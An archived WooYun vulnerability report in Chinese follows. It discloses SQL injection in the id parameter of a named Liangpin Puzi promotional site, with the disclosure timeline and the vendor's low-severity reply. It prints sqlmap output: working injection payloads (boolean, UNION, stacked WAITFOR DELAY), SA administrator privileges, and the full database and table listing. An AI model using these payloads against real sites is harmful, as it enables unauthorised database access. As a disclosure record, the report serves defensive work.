乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-30: 细节已通知厂商并且等待厂商处理中 2015-01-03: 厂商已经确认,细节仅向厂商公开 2015-01-13: 细节向核心白帽子及相关领域专家公开 2015-01-23: 细节向普通白帽子公开 2015-02-02: 细节向实习白帽子公开 2015-02-13: 细节向公众公开
良品铺子某系统高危SQL注射(SA权限)
链接:http://www.517lppz.cn/map.aspx?id=1字段id未过滤。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 5836=5836 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: id=-5132 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(65)+CHAR(98)+CHAR(106)+CHAR(115)+CHAR(80)+CHAR(109)+CHAR(72)+CHAR(107)+CHAR(81)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=1; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=1 WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005database management system users privileges:[*] sa (administrator)[*] whlppzavailable databases [5]:[*] master[*] model[*] msdb[*] tempdb[*] whlppz
Database: whlppz[45 tables]+--------------------+| AboutInfo || BookInfo || CityInfo || ContactInfo || CountyInfo || D99_REG || D99_Tmp || DeliveryAddress || ExchangeEcordsInfo || GoodsInfo || GoodsType || IdPptInfo || IndexPPTInfo || IntegralRule || LinkInfo || LocationInfo || LocationPhoto || LocationType || LoveInfo || LovePhoto || NewsInfo || NewsType || NoticeInfo || NoticeType || NtPptInfo || OrderInfo || PPTInfo || PageSizeInfo || Price || PriceType || ProvinceInfo || ScoreAddRecord || ScoreAddType || UserInfo || VipInfo || WebKeyWord || WebSiteInfo || caseInfo || casePhoto || caseType || dianMianInfo || guangGao || loveType || yinHua || zhaoPingInfo |+--------------------+
不再深入
过滤
危害等级:低
漏洞Rank:5
确认时间:2015-01-03 15:52
公司宣传网站,并非商城业务网站,暂无重要用户数据。。不过还是感谢漏洞作者的提交。。我们尽快处理。。谢谢。。
暂无